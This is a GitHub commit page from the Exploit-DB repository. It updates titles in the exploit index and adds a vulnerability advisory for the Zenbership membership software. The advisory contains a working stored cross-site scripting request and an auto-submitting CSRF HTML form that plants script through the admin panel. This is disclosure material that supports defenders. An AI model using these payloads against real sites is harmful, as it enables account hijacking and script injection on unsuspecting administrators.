Skip to content

Commit

Permalink
DB: 2016-10-24
Browse files Browse the repository at this point in the history 
1 new exploits

dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)
dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)

Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs
Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)

Microsoft Excel 2010 - Crash PoC (2)
Microsoft Excel 2010 - Crash (PoC) (2)

Android 5.0 <= 5.1.1 -  Stagefright .MP4 tx3g Integer Overflow (Metasploit)
Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)

The Unarchiver 3.11.1 - '.tar.Z' Crash PoC
The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)

Microsoft Edge - Function.apply Infomation Leak (MS16-119)
Microsoft Edge - 'Function.apply' Information Leak (MS16-119)

Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)
Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)

Zenbership 107 - Multiple Vulnerabilities
  • Loading branch information
Offensive Security committed Oct 24, 2016
1 parent 6cd9390 commit e380b20
Show file tree
Hide file tree
Showing 2 changed files with 191 additions and 7 deletions.
15 changes: 8 additions & 7 deletions files.csv
View file
Original file line number Diff line number Diff line change
Expand Up @@ -33425,7 +33425,7 @@ id,file,description,date,author,platform,type,port
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
Expand Down Expand Up @@ -35840,7 +35840,7 @@ id,file,description,date,author,platform,type,port
39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0
39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",windows,dos,0
39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80
39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
Expand Down Expand Up @@ -36123,7 +36123,7 @@ id,file,description,date,author,platform,type,port
39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0
39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC (2)",2016-05-16,HauntIT,windows,dos,0
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,windows,dos,0
39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0
39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0
Expand Down Expand Up @@ -36569,7 +36569,7 @@ id,file,description,date,author,platform,type,port
40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0
Expand Down Expand Up @@ -36675,7 +36675,7 @@ id,file,description,date,author,platform,type,port
40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0
40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0
40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",osx,dos,0
40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
40572,platforms/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
40573,platforms/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
Expand Down Expand Up @@ -36706,12 +36706,12 @@ id,file,description,date,author,platform,type,port
40599,platforms/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40600,platforms/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
40601,platforms/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40603,platforms/windows/dos/40603.html,"Microsoft Edge - 'Function.apply' Information Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
Expand All @@ -36720,3 +36720,4 @@ id,file,description,date,author,platform,type,port
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0
40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0
183 changes: 183 additions & 0 deletions platforms/php/webapps/40620.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,183 @@
1. ADVISORY INFORMATION
========================================
Title: Zenbership (latest version) - Multiple Vulnerabilities
Application: Zenbership
Class: Sensitive Information disclosure
Versions Affected: <= latest version )
Vendor URL: https://www.zenbership.com/
Software URL: https://www.zenbership.com/Download
Bugs: CSRF / Persistent Cross Site Scripting
Date of found: 23.10.2016
Author: Besim


2.CREDIT
========================================
Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOĞAN


3. VERSIONS AFFECTED
========================================
<= latest version



4. TECHNICAL DETAILS & POC
========================================


PR1 - Stored Cross Site Scripting
========================================

1 ) Admin login admin panel
2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)
3 ) Attacker enter xss payload to last name input
4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)
5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script>

## HTTP Request ##

POST /zenbership/pp-functions/form_process.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 153

- POST DATA

page=1
&session=zen_0176e737b450bbd83f5fc1066
&first_name=Besim
&last_name=<Script>alert('ExploitDB')</Script>
&email=exploit@yopmail.com


PR2 - CSRF
========================================

1 ) Attacker can add new event with xss payload (stored)
- File : admin/cp-functions/event-add.php

HTTP Request and CSRF PoC
=========================


## HTTP Request ##

POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://site_name/zenbership/admin/index.php?l=events
Content-Length: 1206
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44
Connection: close


- POST DATA


id=JFW996951
&ext=
&edit=0
&event[id]=JFW996951&event[status]=1
&event[name]=<Script>alert('Meryem-ExploitDB');</Script>
&event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p>
&event[post_rsvp_message]=<p>Meryem AKDOGAN</p>
&event[calendar_id]=1
&event[custom_template]=
&tags=
&event[starts]=2016-10-26 00:00:00
&event[ends]=2016-10-28 00:00:00
&event[start_registrations]=2016-10-24 00:00:00
&event[close_registration]=&event[early_bird_end]=
&event[online]=0&event[location_name]=Turkey
&event[url]=&event[address_line_1]=
&event[address_line_2]=&event[city]=
&event[state]=&event[zip]=
&event[country]=
&event[phone]=
&limit_attendees_dud=0
&event[max_rsvps]=
&event[members_only_view]=0
&event[members_only_rsvp]=0
&event[allow_guests]=1
&event[max_guests]=1
&form[col2][Account Overview]=section
&form[col2][company_name]=1
&form[col2][address_line_1]=0
&form[col2][address_line_2]=0
&form[col2][city]=0
&form[col2][state]=0
&form[col2][zip]=0
&form[col2][country]=0
&form[col2][url]=0



## CSRF PoC ##

<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/admin/cp-functions/event-add.php" method="POST">
<input type="hidden" name="id" value="OXH978786" />
<input type="hidden" name="ext" value="" />
<input type="hidden" name="edit" value="0" />
<input type="hidden" name="event&#91;id&#93;" value="OXH978786" />
<input type="hidden" name="event&#91;status&#93;" value="1" />
<input type="hidden" name="event&#91;name&#93;" value="<script>alert&#40;&apos;Meryem&#45;ExploitDB&apos;&#41;&#59;<&#47;Script>" />
<input type="hidden" name="event&#91;tagline&#93;" value="meryem" />
<input type="hidden" name="event&#91;description&#93;" value="<p>Meryem&#32;AKDOGAN<&#47;p>&#13;&#10;" />
<input type="hidden" name="event&#91;post&#95;rsvp&#95;message&#93;" value="<p>Meryem&#32;AKDOGAN<&#47;p>&#13;&#10;" />
<input type="hidden" name="event&#91;calendar&#95;id&#93;" value="1" />
<input type="hidden" name="event&#91;custom&#95;template&#93;" value="" />
<input type="hidden" name="tags" value="meryem" />
<input type="hidden" name="event&#91;starts&#93;" value="2016&#45;10&#45;26&#32;00&#58;00&#58;00" />
<input type="hidden" name="event&#91;ends&#93;" value="2016&#45;10&#45;28&#32;00&#58;00&#58;00" />
<input type="hidden" name="event&#91;start&#95;registrations&#93;" value="2016&#45;10&#45;24&#32;00&#58;00&#58;00" />
<input type="hidden" name="event&#91;close&#95;registration&#93;" value="" />
<input type="hidden" name="event&#91;early&#95;bird&#95;end&#93;" value="" />
<input type="hidden" name="event&#91;online&#93;" value="0" />
<input type="hidden" name="event&#91;location&#95;name&#93;" value="Turkey" />
<input type="hidden" name="event&#91;url&#93;" value="" />
<input type="hidden" name="event&#91;address&#95;line&#95;1&#93;" value="" />
<input type="hidden" name="event&#91;address&#95;line&#95;2&#93;" value="" />
<input type="hidden" name="event&#91;city&#93;" value="" />
<input type="hidden" name="event&#91;state&#93;" value="" />
<input type="hidden" name="event&#91;zip&#93;" value="" />
<input type="hidden" name="event&#91;country&#93;" value="" />
<input type="hidden" name="event&#91;phone&#93;" value="" />
<input type="hidden" name="limit&#95;attendees&#95;dud" value="0" />
<input type="hidden" name="event&#91;max&#95;rsvps&#93;" value="" />
<input type="hidden" name="event&#91;members&#95;only&#95;view&#93;" value="0" />
<input type="hidden" name="event&#91;members&#95;only&#95;rsvp&#93;" value="0" />
<input type="hidden" name="event&#91;allow&#95;guests&#93;" value="1" />
<input type="hidden" name="event&#91;max&#95;guests&#93;" value="1" />
<input type="hidden" name="form&#91;col2&#93;&#91;Account&#32;Overview&#93;" value="section" />
<input type="hidden" name="form&#91;col2&#93;&#91;company&#95;name&#93;" value="1" />
<input type="hidden" name="form&#91;col2&#93;&#91;address&#95;line&#95;1&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;address&#95;line&#95;2&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;city&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;state&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;zip&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;country&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;url&#93;" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

0 comments on commit e380b20

Please sign in to comment.